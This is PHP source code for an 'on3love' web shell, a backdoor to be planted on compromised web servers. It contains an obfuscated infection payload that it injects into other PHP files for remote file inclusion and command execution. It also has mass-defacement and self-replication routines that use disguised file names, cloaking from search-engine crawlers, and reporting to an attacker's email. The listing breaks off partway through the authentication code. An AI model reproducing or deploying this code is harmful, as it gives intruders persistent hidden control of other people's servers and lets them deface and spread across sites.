<?php
#=============on3love=================][>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
#### [KNOWN ISSUE]
##### [!]$infeksi will fail on php >5.3 cause i forgot to test on 5.3 before do some manual encryption [Cause: Lazyness to do again]
##### ps: replace $infeksi with your own instead.
##
##[SAFETY CAN BE FUN] for now only static i will refuck my brain to think another safetyway without reducing the flexiblity
#Support dynamic IP
#Use no-ip/dyndns account
#and Dont crypt it with md5
#
#Version 2.5.3
//rewriting $authip core block
//$authip now support raw ipv4
#Version 2.5.2
//Rewrite most function
//Remove few userDefined [Automated Defining instead]
//Remove 2 actionMode [Replaced by Logmail instead]
//Added URL Referrer Auth
//AutoHide annoying viewpane LOL
//Added List of Authorized IP using Array rather than 1 static ip or dynamic only
#####[ADDED FEATURE]=============================================================>
/**

1.  Multi Authentication IP/URL (Dynamic|Static) / (HTTP Referer) [ASSIGNED VARIABLE] AUTHTYPE
1.1 Current Configuration ViewPanel

2.  LOGmail when triggered [ASSIGNED VARIABLE] $emailku

3.  ACTion for unauthorized (Best use with LOGMAIL) [ASSIGNED VARIABLE] $aksi
3.1  redirect: to google [ASSIGNED VARIABLE] $redirecto
3.2  selfkill: kill self if not authorized
3.3  scatter: replication [ASSIGNED VARIABLE] $scatterName
3.4  scatter+k: die 1 born 100 or even 1000 LOL  [ASSIGNED VARIABLE] $scatterName

4.  Stealth Infection [No FileTime Change]
4.1  Manually multi level encoded infection [ASSIGNED VARIABLE] $infeksi, $cekinfeksi
4.1.1 RFI/CMD with stderr and condition check. infected.php?on3loveRFI= infected.php?on3loveCMD= 

5.  Mass Deface index.*
5.1 User Defined Deface content [ASSIGNED VARIABLE] $defacebody
  
6.  Exploit Browser Page

7.  Shellc0de Like encoder/decoder

8.  Invisible Login form

#####[Planned Feature]
-Live editting configuration (maybe.. too cosmetic)
-Several Payload (meterpreter etc..)
**/ 

###  AKSI == ACTION
##redirect: to google [ASSIGNED VARIABLE] $aksi
##selfkill: kill self if not authorized
##scatter: replication [ASSIGNED VARIABLE] $scatterName, $emailku
##scatter+k: die and create + suicide  
###

#========================
#DEFAULT Base VAR
#========================
$auth_pass = "46f94c8de14fb36680850768ff1b7f2a"; // Password
$color = "#3BBEFF"; // Color
$default_action = 'FilesMan'; // Default page
#========================
#[ACTION TO TAKE]
#========================
$aksi = 'redirect'; // action to take of unauthorized ip/referrer
#========================
####### BELOW are configuration for the action. ###########
####### BELOW are configuration for the action. ###########
####### BELOW are configuration for the action. ###########
####### BELOW are configuration for the action. ###########
#========================
#AUTHType switch value(ip/url/none)
## Suggested NO-IP account if your ip is dynamic. (MD5 Value not allowed)
#========================
@define(AUTHTYPE, 'ip'); // ip or url
$ipauth = array('surga' => '0496fc562b269becc214b55c0491ab5f', 
				'on3love'  => '4cff4b3272bc11d62f43c59ff0ca2711', 
				'lupa' => '13451486a47abe480e2541f9334dff6f', 
				'test' => '1f705490ba5e26d147305b853d468f25', 
				'siapa ini' => '615bf81ef820463399cc83e705158951'); //list of allowed ip
$urlauth = ''; // HTTP Referrer auth method ( your own way to this shell :) )
#========================
##[ACTION] : REDIRECT
#========================
$redirecto = "Location: http://".$_SERVER['SERVER_ADDR']."";
#========================
##[ACTION] : SCATTER
#========================
$emailku = 'sysadmin47@gmail.com'; // for mailreport if somebody trying to acces this
$scatterName = array('verslon.php', 'googie.php', 'wp-plugln.php'); //name to scatter
#========================
##[INFEKSI] to use = _GET(cmd) || _GET(include) 
#========================
$cekinfeksi = "/googlebot47/";
$infeksi = '<?php /**googlebot47**/ $_al111128342ea3f22372="\x69\x6e\x69\x5f\x73\x65\x74";$_al111128342ea3f22372(\'\x61\x6c\x6c\x6f\x77\x5f\x75\x72\x6c\x5f\x69\x6e\x63\x6c\x75\x64\x65\',1);$_al11112835829482372="\x6f\x6e3\x6c\x6f\x76e\x52\x46\x49";$_a111l12835829482372="\x6f\x6e\x33\x6c\x6f\x76\x65\x43\x4d\x44";$_alllll2835829482372="\x70\x72\x65\x67\x5f\x72\x65\x70\x6c\x61\x63\x65";$_al11191212315291391="\x64\x65\x66\x69\x6e\x65";$_al11191212315291391("_a1l1191212315291391_","\x44\x64\x52\x46\x44\x75\x7a\x59\x41\x51\x44\x41\x71\x32\x51\x33\x38\x2b\x57\x46\x73\x51\x32\x4b\x5a\xa\x6d\x48\x47\x39\x6a\x50\x54\x4a\x6a\x4b\x32\x6d\x66\x6e\x30\x6d\x54\x75\x55\x71\x6a\x7a\x54\x2f\x75\x2f\x66\x32\x34\x78\x56\x6e\x2b\x37\x6c\x33\x31\x6d\x36\x6c\x53\x54\x78\x76\x36\x4c\x4d\x70\x36\x4c\x38\x2b\x79\x2b\x68\xa\x38\x4b\x52\x33\x63\x57\x4a\x57\x46\x4f\x72\x67\x30\x78\x63\x46\x6b\x55\x76\x5a\x4d\x58\x37\x5a\x42\x75\x71\x32\x72\x34\x71\x4c\x45\x4e\x76\x55\x32\x63\x62\x41\x31\x58\x33\x6d\x6d\x6e\x71\x43\x50\x48\x53\x4b\x46\x56\x6f\xa\x2f\x37\x2b\x46\x48\x32\x52\x53\x63\x6c\x49\x6b\x59\x62\x74\x74\x59\x71\x4e\x43\x70\x54\x77\x33\x42\x74\x2b\x6f\x70\x53\x54\x58\x59\x55\x4a\x42\x4b\x43\x50\x45\x30\x44\x41\x36\x61\x38\x79\x53\x33\x41\x65\x54\x70\x69\x46\xa\x38\x67\x74\x6a\x2f\x31\x30\x71\x58\x43\x54\x58\x45\x64\x43\x37\x48\x53\x62\x45\x4f\x2f\x55\x4d\x38\x51\x6a\x37\x6d\x73\x41\x30\x62\x6d\x66\x4c\x69\x2b\x2b\x48\x57\x70\x56\x6e\x63\x39\x6c\x42\x6d\x47\x43\x46\x43\x4b\x69\xa\x48\x74\x73\x66\x6c\x71\x6c\x47\x6f\x7a\x48\x55\x35\x78\x69\x68\x7a\x35\x5a\x77\x53\x72\x5a\x6f\x6b\x38\x72\x72\x49\x58\x75\x36\x58\x77\x2b\x38\x5a\x4d\x78\x75\x44\x58\x6d\x4d\x74\x79\x69\x58\x33\x7a\x30\x78\x31\x2f\x35\xa\x34\x6c\x69\x35\x34\x75\x4f\x36\x71\x32\x76\x4d\x31\x44\x42\x4f\x4d\x78\x38\x30\x55\x62\x54\x39\x43\x47\x58\x2f\x41\x51\x2b\x55\x36\x59\x32\x74\x2f\x4e\x79\x43\x34\x66\x4b\x36\x76\x6f\x35\x2b\x53\x2f\x71\x48\x43\x43\x64\xa\x44\x6f\x75\x75\x4f\x66\x69\x55\x5a\x69\x62\x67\x30\x72\x45\x4a\x75\x51\x48\x4b\x69\x43\x56\x4a\x30\x38\x77\x78\x78\x44\x37\x6c\x65\x65\x54\x77\x71\x73\x39\x69\x46\x62\x49\x36\x57\x6d\x72\x54\x65\x62\x34\x47\x38\x53\x4c\x39\x4b\x35\x72\x67\x49\x6e\x59\x73\x51\x66\x42\x4b\x57\x44\x56\x6e\x72\x6d\x39\x6b\x51\x76\x62\x57\x39\x4d\x2b\x47\x45\x6f\x30\x67\x33\x76\x53\x7a\x77\x78\x53\x52\x6f\x6c\x50\x2b\x4d\x51\x4e\x66\x55\x58\x2b\x69\x49\x45\xa\x74\x64\x72\x77\x6c\x6f\x46\x30\x79\x4c\x66\x64\x53\x76\x79\x66\x61\x73\x74\x2b\x4e\x66\x6b\x7a\x72\x37\x73\x46\x4f\x38\x45\x69\x4d\x2f\x76\x44\x6e\x75\x73\x79\x68\x56\x4d\x7a\x4f\x73\x63\x63\x61\x55\x4a\x76\x34\x7a\x75\xa\x46\x41\x34\x67\x39\x2b\x32\x31\x38\x57\x6e\x67\x33\x51\x49\x55\x79\x67\x66\x74\x55\x4d\x37\x37\x30\x50\x56\x67\x45\x57\x69\x30\x71\x6f\x45\x72\x6b\x61\x36\x66\x33\x4b\x4c\x43\x4a\x43\x50\x2b\x58\x59\x38\x51\x55\x36\x54\xa\x63\x51\x2f\x49\x39\x6f\x6b\x45\x62\x50\x57\x75\x55\x6b\x6f\x4a\x73\x49\x34\x65\x35\x78\x76\x64\x31\x37\x31\x32\x76\x6f\x69\x62\x6a\x78\x46\x45\x59\x36\x62\x56\x7a\x50\x30\x4e\x52\x38\x6d\x65\x54\x61\x75\x53\x46\x57\x4a\xa\x75\x42\x38\x4a\x42\x71\x6d\x64\x79\x59\x61\x6e\x4c\x72\x64\x2b\x6f\x69\x50\x73\x75\x37\x77\x37\x39\x37\x52\x4a\x5a\x67\x73\x35\x4a\x52\x6f\x33\x54\x66\x48\x4f\x4f\x32\x44\x4a\x31\x50\x42\x61\x2b\x71\x4a\x31\x6c\x5a\x73\xa\x38\x55\x79\x69\x6a\x2b\x59\x4b\x7a\x6f\x6d\x36\x66\x4b\x56\x71\x69\x6c\x7a\x34\x2b\x69\x74\x6d\x4b\x42\x4b\x38\x31\x54\x37\x67\x30\x6a\x4b\x35\x55\x61\x44\x62\x30\x77\x71\x55\x43\x47\x4a\x75\x34\x56\x4c\x48\x37\x6b\x5a\xa\x4c\x62\x65\x42\x6c\x6f\x61\x37\x66\x42\x6e\x45\x38\x6d\x35\x6c\x4b\x2b\x34\x2b\x4a\x38\x65\x6f\x4a\x57\x78\x43\x61\x57\x2b\x72\x58\x79\x62\x53\x76\x73\x6f\x51\x38\x64\x6b\x57\x4b\x37\x75\x31\x38\x55\x75\x6a\x4e\x44\x78\xa\x79\x37\x4e\x6e\x51\x34\x4c\x61\x49\x51\x43\x50\x61\x56\x50\x2f\x31\x74\x35\x6b\x50\x4c\x57\x55\x43\x4f\x39\x69\x72\x43\x4a\x6c\x66\x4d\x63\x74\x6f\x33\x75\x61\x63\x48\x44\x72\x51\x4e\x62\x42\x2b\x34\x6c\x56\x53\x4b\x64lt9/e2ox/WDOfBQYC83o9RbXvrfN0fTla7a9OSkNRgX6vOXyiVma+5n");$_al11191212315291391("_a11l1912123l5291391_","5OTCmVTvvLU4oMd\x4e\x37\x4b\x32\x68\x4a\x49\x32\x66\x53\x49\x76\x4c\x58\x63\x58\x36\x79\x62\x65\x63\x61\x46\x62\x4c\x48\x2f\x6d\x37\x61\x58\x64\x6b\x31\x32\x47\x6d\x70\x70\x4b/k7nPJ");$_al11191212315291391("_a11l19121235291391l_","\x2f\x47\x63\x67\x57\x70\x64\x62\x71\x41\x46\x2f\x43\x59\x77\x6d\x4d\x37\x77\x6a\x41\x79\x36\x41\x2b\x4f\x33\x6f\x73\x76\x54\x69\x42\x74\x50\x43\x51\x53\x31\x43\x65\x5a\x2b\x55\x47\x51\x76\x68\x6d\xa\x4d\x59\x5a\x56\x4c\x71\x67\x68\x67\x31\x63\x55\x2b\x4f\x62\x42\x46\x32\x5a\x6b\x7a\x45\x74\x75\x6a\x6f\x53\x59\x6f\x4e\x77\x59\x52\x61\x57\x77\x53\x30\x2b\x69\x47\x47\x48\x4f\x51\x56\x4d\x63\x6f\x61\x55\x6c\x6d\x6f\x37\xa\x4e\x4c\x61\x4d\x48\x63\x69\x50\x5a\x64\x38\x62\x46\x30\x32\x54\x68\x35\x68\x45\x64\x66\x68\x55\x63\x36\x52\x55\x64\x7a\x56\x4e\x6c\x52\x6a\x55\x45\x50\x30\x74\x76\x6c\x77\x74\x43\x47\x4c\x4f\x32\x4f\x36\x61\x6b\x6e\x69\xa\x73\x6d\x51\x41\x72\x43\x76\x6b\x42\x6c\x46\x6e\x58\x5a\x4c\x53\x4d\x4a\x31\x77\x62\x54\x6d\x57\x4a\x75\x69\x57\x46\x46\x65\x61\x4a\x74\x4f\x4e\x36\x62\x67\x34\x64\x50\x57\x45\x70\x4b\x6a\x52\x69\x57\x39\x46\x75\x4f\x2b\xa\x49\x6a\x4e\x79\x30\x70\x6b\x78\x37\x4b\x49\x30\x42\x6d\x49\x4f\x63\x39\x50\x63\x66\x30\x46\x4d\x52\x37\x43\x44\x70\x48\x70\x30\x52\x64\x4b\x5a\x46\x35\x4f\x76\x50\x55\x4e\x61\x6d\x67\x59\x6e\x30\x59\x67\x75\x46\x6d\x4b\xa\x50\x76\x64\x49\x78\x35\x36\x36\x49\x33\x76\x68\x75\x55\x65\x41\x37\x6e\x4c\x71\x6a\x38\x72\x6f\x72\x2f\x41\x72\x52\x30\x4f\x50\x66\x4c\x58\x6a\x62\x65\x32\x50\x49\x31\x62\x66\x46\x6b\x74\x63\x41\x6c\x4d\x2f\x70\x68\x57\x70\x51\x62\x4d\x6d\x58\x48\x6a\x74\x54\x70\x36\x53\x58\x7a\x67\x57\x38\x66\x63\x57\x38\x62\x67\x6e\x72\x69\x41\x4b\x47\x58\x37\x75\x66\x36\x30\x67\x2b\x61\x6a\x4f\x31\x52\x45\x47\x59\x46\x33\x2b\x6f\x6b\x72\x42\x55\x65\xa\x61\x49\x69\x77\x59\x76\x49\x56\x77\x79\x79\x33\x68\x35\x59\x33\x45\x33\x4d\x38\x63\x57\x42\x64\x38\x4e\x6d\x75\x75\x49\x39\x5a\x52\x72\x6e\x30\x75\x73\x4b\x69\x44\x5a\x43\x39\x56\x7a\x4d\x42\x4c\x6c\x59\x49\x4e\x39\x4e\xa\x75\x6f\x37\x39\x42\x59\x4f\x74\x7a\x6a\x46\x55\x56\x4b\x54\x43\x45\x39\x50\x79\x47\x59\x6d\x64\x4b\x32\x67\x70\x78\x78\x32\x4c\x46\x32\x54\x38\x43\x6b\x78\x4d\x79\x76\x69\x50\x43\x6e\x46\x38\x38\x57\x38\x52\x62\x4e\x52\xa\x58\x2b\x55\x53\x64\x70\x77\x56\x6c\x30\x31\x37\x55\x42\x56\x32\x54\x5a\x53\x6b\x4f\x4f\x50\x6b\x57\x70\x36\x65\x6b\x41\x78\x38\x4a\x76\x51\x58\x51\x68\x67\x69\x52\x72\x58\x73\x69\x32\x62\x43\x2b\x62\x41\x71\x6e\x72\x59\xa\x63\x68\x50\x6d\x6e\x4c\x33\x75\x74\x61\x6c\x73\x44\x77\x64\x36\x31\x56\x7a\x46\x51\x64\x69\x77\x48\x37\x4b\x36\x4e\x72\x70\x43\x70\x52\x32\x2b\x70\x66\x31\x36\x49\x5a\x63\x32\x50\x6d\x4c\x65\x56\x57\x4a\x43\x50\x4a\x5a\xa\x55\x42\x6a\x37\x42\x65\x77\x54\x72\x31\x51\x35\x41\x62\x64\x4a\x37\x33\x50\x6c\x72\x37\x4d\x64\x4f\x4f\x46\x32\x42\x75\x71\x50\x65\x4f\x6f\x4f\x30\x7a\x35\x68\x62\x59\x67\x38\x75\x64\x73\x53\x73\x62\x43\x52\x33\x66\x44\xa\x75\x58\x56\x2f\x45\x73\x53\x4c\x57\x4e\x56\x4a\x2b\x65\x63\x43\x63\x75\x70\x6f\x41\x33\x7a\x69\x36\x49\x65\x47\x71\x68\x4f\x47\x61\x65\x48\x36\x35\x35+//\x76\x7a\x35\x38\x39///B8");$_e39l8234814375193="\x65\x76\x61\x6c";$_e39182348l4375193="\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65";$_e3918234814375l93="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";$_alllll2835829482372("\x7c\x2e\x7c\x65","$_e39l8234814375193(\'\x65\x76\x61\x6c(\x24\x5f\x65\x33\x39\x31\x38\x32\x33\x34\x38\x6c\x34\x33\x37\x35\x31\x39\x33\x28\x24\x5f\x65\x33\x39\x31\x38\x32\x33\x34\x38\x31\x34\x33\x37\x35\x6c\x393(\x5f\x61\x31\x6c\x31\x31\x39\x31\x32\x31\x32\x33\x31\x35\x32\x39\x31\x33\x39\x31\x5f\x2e\x5f\x61\x31\x31\x6c\x31\x39\x31\x32\x31\x32\x33\x6c\x35\x32\x39\x31\x33\x39\x31\x5f\x2e\x5f\x61\x31\x31\x6c\x31\x39\x31\x32\x31\x32\x33\x35\x32\x39\x31\x33\x39\x31\x6c\x5f.x3d\x29));\')",\'.\');?>';

#========================
##[DEFACE HTML BODY]
#========================
$defacebody = "<center><font size='25' color='black'>[If you see this im sure 90% it was a mistake or i was testing my script im sorry]";
#========================
##[Dynamic IP Updater] 
#========================
$noipUser = 'xxx@xxx.com'; // Can Be Email or Username of your NO-IP Account
$noipPass = 'xxx';
$noipHost = 'xxx.bounceme.net';
$noipToIP = "{$_SERVER['REMOTE_ADDR']}";
#=============on3love=================][>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
ob_start();
die(header('HTTP/1.0 404 Not Found'));
ob_end_flush();
exit;
}
}


function isValidMd5($md5) {
   return !empty($md5) && preg_match('/^[a-f0-9]{32}$/', $md5);
}
function on3loveAksi($aksi, $logmail, $scatterName, $redirecto) {
       ob_start();
       if(isset($logmail)){
           foreach ($scatterName as $pname) {
               @mail($logmail, $_SERVER['SERVER_NAME'], $_SERVER['SERVER_NAME'] . $pname); }
       }
      switch ($aksi) {
         case 'debug':
			echo('s');
            break;
         case 'selfkill': die(unlink(__FILE__));
            exit;
            break;
         case 'redirect': 
            die(header($redirecto));  
			ob_flush();
            break;
         case 'scatter': foreach ($scatterName as $pname) {
              @copy(__FILE__, $GLOBALS['cwd'] . $pname);
            } break;
         case 'scatter+k': foreach ($scatterName as $pname) {
               @copy(__FILE__, $GLOBALS['cwd'] . $pname);
            } unlink(__FILE__);
            break;
         default: break;
      }
         ob_end_flush();
   }
function dynamicUpdater($host, $myip, $pat, $user, $pass) {
   if (preg_match($pat, gethostbyaddr($_SERVER['REMOTE_ADDR']))) {
      $noip = @file_get_contents("
      http://$user:$pass@dynupdate.no-ip.com/nic/update?hostname=$host&myip={$myip}");
      if (preg_match("/{$_SERVER['REMOTE_ADDR']}/", $noip, $newip)) {
         return $newip;
      }
   }
}
function arraycheckLove($stringtocheck, $kondisi, $dosomething, $kondisibool = false){
   if(is_array($stringtocheck)){
     if(!in_array($kondisi, $stringtocheck)) {$dosomething;}
   }if(!is_array($stringtocheck)){
     if($kondisibool == false)
      if($kondisi != $stringtocheck){  $dosomething; }
     else
      if($kondisi == $stringtocheck){  $dosomething; }
   }
   
}

function on3loveREGEX($search = '',$pattern, $isarray = false){
		if($isarray == true)
			foreach($pattern as $arraylisting)
			
	switch($type)
	{
		case 'ip':
			if($isarray == true){
			foreach($pattern as $arraylisting)
			 if(preg_replace('/^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$/', md5($arraylisting), $arraylisting))
				return ;
			 else
				return false;
			}else{
			if(preg_match('/^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$/',$pattern, $match))
				return true;
				else
				return false;}
			break;
		case 'domain':
			if($isarray == true){
			foreach($pattern as $arraylisting)
		     if(preg_match('/^(([a-z0-9]+|([a-z0-9]+[-]+[a-z0-9]+))[.])+(AC|AD|AE|AERO|AF|AG|AI|AL|AM|AN|AO|AQ|AR|ARPA|AS|ASIA|AT|AU|AW|AX|AZ|BA|BB|BD|BE|BF|BG|BH|BI|BIZ|BJ|BM|BN|BO|BR|BS|BT|BV|BW|BY|BZ|CA|CAT|CC|CD|CF|CG|CH|CI|CK|CL|CM|CN|CO|COM|COOP|CR|CU|CV|CX|CY|CZ|DE|DJ|DK|DM|DO|DZ|EC|EDU|EE|EG|ER|ES|ET|EU|FI|FJ|FK|FM|FO|FR|GA|GB|GD|GE|GF|GG|GH|GI|GL|GM|GN|GOV|GP|GQ|GR|GS|GT|GU|GW|GY|HK|HM|HN|HR|HT|HU|ID|IE|IL|IM|IN|INFO|INT|IO|IQ|IR|IS|IT|JE|JM|JO|JOBS|JP|KE|KG|KH|KI|KM|KN|KP|KR|KW|KY|KZ|LA|LB|LC|LI|LK|LR|LS|LT|LU|LV|LY|MA|MC|MD|ME|MG|MH|MIL|MK|ML|MM|MN|MO|MOBI|MP|MQ|MR|MS|MT|MU|MUSEUM|MV|MW|MX|MY|MZ|NA|NAME|NC|NE|NET|NF|NG|NI|NL|NO|NP|NR|NU|NZ|OM|ORG|PA|PE|PF|PG|PH|PK|PL|PM|PN|PR|PRO|PS|PT|PW|PY|QA|RE|RO|RS|RU|RW|SA|SB|SC|SD|SE|SG|SH|SI|SJ|SK|SL|SM|SN|SO|SR|ST|SU|SV|SY|SZ|TC|TD|TEL|TF|TG|TH|TJ|TK|TL|TM|TN|TO|TP|TR|TRAVEL|TT|TV|TW|TZ|UA|UG|UK|US|UY|UZ|VA|VC|VE|VG|VI|VN|VU|WF|WS|XN|XN|XN|XN|XN|XN|XN|XN|XN|XN|XN|YE|YT|YU|ZA|ZM|ZW)[.]?$/i', $arraylisting))
				return true;
				else
				return false;
			}else{
			 if(preg_match('/^(([a-z0-9]+|([a-z0-9]+[-]+[a-z0-9]+))[.])+(AC|AD|AE|AERO|AF|AG|AI|AL|AM|AN|AO|AQ|AR|ARPA|AS|ASIA|AT|AU|AW|AX|AZ|BA|BB|BD|BE|BF|BG|BH|BI|BIZ|BJ|BM|BN|BO|BR|BS|BT|BV|BW|BY|BZ|CA|CAT|CC|CD|CF|CG|CH|CI|CK|CL|CM|CN|CO|COM|COOP|CR|CU|CV|CX|CY|CZ|DE|DJ|DK|DM|DO|DZ|EC|EDU|EE|EG|ER|ES|ET|EU|FI|FJ|FK|FM|FO|FR|GA|GB|GD|GE|GF|GG|GH|GI|GL|GM|GN|GOV|GP|GQ|GR|GS|GT|GU|GW|GY|HK|HM|HN|HR|HT|HU|ID|IE|IL|IM|IN|INFO|INT|IO|IQ|IR|IS|IT|JE|JM|JO|JOBS|JP|KE|KG|KH|KI|KM|KN|KP|KR|KW|KY|KZ|LA|LB|LC|LI|LK|LR|LS|LT|LU|LV|LY|MA|MC|MD|ME|MG|MH|MIL|MK|ML|MM|MN|MO|MOBI|MP|MQ|MR|MS|MT|MU|MUSEUM|MV|MW|MX|MY|MZ|NA|NAME|NC|NE|NET|NF|NG|NI|NL|NO|NP|NR|NU|NZ|OM|ORG|PA|PE|PF|PG|PH|PK|PL|PM|PN|PR|PRO|PS|PT|PW|PY|QA|RE|RO|RS|RU|RW|SA|SB|SC|SD|SE|SG|SH|SI|SJ|SK|SL|SM|SN|SO|SR|ST|SU|SV|SY|SZ|TC|TD|TEL|TF|TG|TH|TJ|TK|TL|TM|TN|TO|TP|TR|TRAVEL|TT|TV|TW|TZ|UA|UG|UK|US|UY|UZ|VA|VC|VE|VG|VI|VN|VU|WF|WS|XN|XN|XN|XN|XN|XN|XN|XN|XN|XN|XN|YE|YT|YU|ZA|ZM|ZW)[.]?$/i', $authip))
				return true;
				else
				return false;}
			 break;
	}
	

}

/**
switch (on3loveREGEX('ip', $ipauth, null, true)){
			case true: 
				if(!in_array($_SERVER['REMOTE_ADDR'], $ipauth)){
				on3loveAksi($aksi, $emailku, $scatterName, $redirecto);
				}
				break;
			case false:
				if (!in_array(md5($_SERVER['REMOTE_ADDR']), $ipauth)){
				on3loveAksi($aksi, $emailku, $scatterName, $redirecto);	
				}
				break;
		  
		  }
**/
if (AUTHTYPE == 'ip'){
   /**
  if(is_array($ipauth)){
     foreach($ipauth as $authip)
   if (!isvalidmd5($authip))
      $iptype = 'dynamic'; 
   if (isValidMd5($authip))
      $iptype = 'static';}else
      {if (!isvalidmd5($ipauth))
      $iptype = 'dynamic'; 
   if (isValidMd5($ipauth))
      $iptype = 'static';}**/
   switch(is_array($ipauth)){
      case false:  
         if (isvalidmd5($ipauth))
            $iptype = 'static'; 
         else
            $iptype = 'dynamic';
         break;
      case true: 
        foreach($ipauth as $authip)
         if (isvalidmd5($authip) || (preg_match('/^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$/', $authip))  ) 
			$iptype = 'static'; 
		foreach($ipauth as $authip)	
		 if (preg_match('/^(([a-z0-9]+|([a-z0-9]+[-]+[a-z0-9]+))[.])+(AC|AD|AE|AERO|AF|AG|AI|AL|AM|AN|AO|AQ|AR|ARPA|AS|ASIA|AT|AU|AW|AX|AZ|BA|BB|BD|BE|BF|BG|BH|BI|BIZ|BJ|BM|BN|BO|BR|BS|BT|BV|BW|BY|BZ|CA|CAT|CC|CD|CF|CG|CH|CI|CK|CL|CM|CN|CO|COM|COOP|CR|CU|CV|CX|CY|CZ|DE|DJ|DK|DM|DO|DZ|EC|EDU|EE|EG|ER|ES|ET|EU|FI|FJ|FK|FM|FO|FR|GA|GB|GD|GE|GF|GG|GH|GI|GL|GM|GN|GOV|GP|GQ|GR|GS|GT|GU|GW|GY|HK|HM|HN|HR|HT|HU|ID|IE|IL|IM|IN|INFO|INT|IO|IQ|IR|IS|IT|JE|JM|JO|JOBS|JP|KE|KG|KH|KI|KM|KN|KP|KR|KW|KY|KZ|LA|LB|LC|LI|LK|LR|LS|LT|LU|LV|LY|MA|MC|MD|ME|MG|MH|MIL|MK|ML|MM|MN|MO|MOBI|MP|MQ|MR|MS|MT|MU|MUSEUM|MV|MW|MX|MY|MZ|NA|NAME|NC|NE|NET|NF|NG|NI|NL|NO|NP|NR|NU|NZ|OM|ORG|PA|PE|PF|PG|PH|PK|PL|PM|PN|PR|PRO|PS|PT|PW|PY|QA|RE|RO|RS|RU|RW|SA|SB|SC|SD|SE|SG|SH|SI|SJ|SK|SL|SM|SN|SO|SR|ST|SU|SV|SY|SZ|TC|TD|TEL|TF|TG|TH|TJ|TK|TL|TM|TN|TO|TP|TR|TRAVEL|TT|TV|TW|TZ|UA|UG|UK|US|UY|UZ|VA|VC|VE|VG|VI|VN|VU|WF|WS|XN|XN|XN|XN|XN|XN|XN|XN|XN|XN|XN|YE|YT|YU|ZA|ZM|ZW)[.]?$/i', $authip)) 
            $iptype = 'dynamic';
			
   break;
         
   }   
       //|| (preg_match('/^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$/',$authip)))
           // (preg_match('/^(([a-z0-9]+|([a-z0-9]+[-]+[a-z0-9]+))[.])+(AC|AD|AE|AERO|AF|AG|AI|AL|AM|AN|AO|AQ|AR|ARPA|AS|ASIA|AT|AU|AW|AX|AZ|BA|BB|BD|BE|BF|BG|BH|BI|BIZ|BJ|BM|BN|BO|BR|BS|BT|BV|BW|BY|BZ|CA|CAT|CC|CD|CF|CG|CH|CI|CK|CL|CM|CN|CO|COM|COOP|CR|CU|CV|CX|CY|CZ|DE|DJ|DK|DM|DO|DZ|EC|EDU|EE|EG|ER|ES|ET|EU|FI|FJ|FK|FM|FO|FR|GA|GB|GD|GE|GF|GG|GH|GI|GL|GM|GN|GOV|GP|GQ|GR|GS|GT|GU|GW|GY|HK|HM|HN|HR|HT|HU|ID|IE|IL|IM|IN|INFO|INT|IO|IQ|IR|IS|IT|JE|JM|JO|JOBS|JP|KE|KG|KH|KI|KM|KN|KP|KR|KW|KY|KZ|LA|LB|LC|LI|LK|LR|LS|LT|LU|LV|LY|MA|MC|MD|ME|MG|MH|MIL|MK|ML|MM|MN|MO|MOBI|MP|MQ|MR|MS|MT|MU|MUSEUM|MV|MW|MX|MY|MZ|NA|NAME|NC|NE|NET|NF|NG|NI|NL|NO|NP|NR|NU|NZ|OM|ORG|PA|PE|PF|PG|PH|PK|PL|PM|PN|PR|PRO|PS|PT|PW|PY|QA|RE|RO|RS|RU|RW|SA|SB|SC|SD|SE|SG|SH|SI|SJ|SK|SL|SM|SN|SO|SR|ST|SU|SV|SY|SZ|TC|TD|TEL|TF|TG|TH|TJ|TK|TL|TM|TN|TO|TP|TR|TRAVEL|TT|TV|TW|TZ|UA|UG|UK|US|UY|UZ|VA|VC|VE|VG|VI|VN|VU|WF|WS|XN|XN|XN|XN|XN|XN|XN|XN|XN|XN|XN|YE|YT|YU|ZA|ZM|ZW)[.]?$/i', $authip))
            
if ($_SERVER['REMOTE_ADDR'] != '127.0.0.1') {
   switch ($iptype) {
      case 'static':
         if(is_array($ipauth)){ //arraystart
		 
		  foreach($ipauth as $ipmatching)
		  switch(preg_match("/{$_SERVER['REMOTE_ADDR']}/", $ipmatching)){ // CHECK RAW
			case TRUE: 
			   if(!in_array($_SERVER['REMOTE_ADDR'], $ipauth)){ //KALO RAW IP tidak DALAM ARRAY
				 on3loveAksi($aksi, $emailku, $scatterName, $redirecto);
                }
			 break;
			case FALSE:
			   foreach($ipauth as $match)
			   preg_match("/{$_SERVER['REMOTE_ADDR']}/", $match, $holder);
			   foreach($holder as $result)
			   if(!isvalidmd5($result))
			   $ipauth = preg_replace("/{$result}/", md5($result), $result);
			   if(!in_array($_SERVER['REMOTE_ADDR'], $ipauth) && !in_array(md5($_SERVER['REMOTE_ADDR']), $ipauth) ){ //KALO RAW IP tidak DALAM ARRAY
				 on3loveAksi($aksi, $emailku, $scatterName, $redirecto);
                }
			 break;
		  }
		  
		  
         }//arrayeend
         elseif(!is_array($ipauth)){if ((md5($_SERVER['REMOTE_ADDR']) != $ipauth)) {
            on3loveAksi($aksi, $emailku, $scatterName, $redirecto);
            }  
         }
         break;
      case 'dynamic':
         $ipauth = gethostbyname($ipauth);
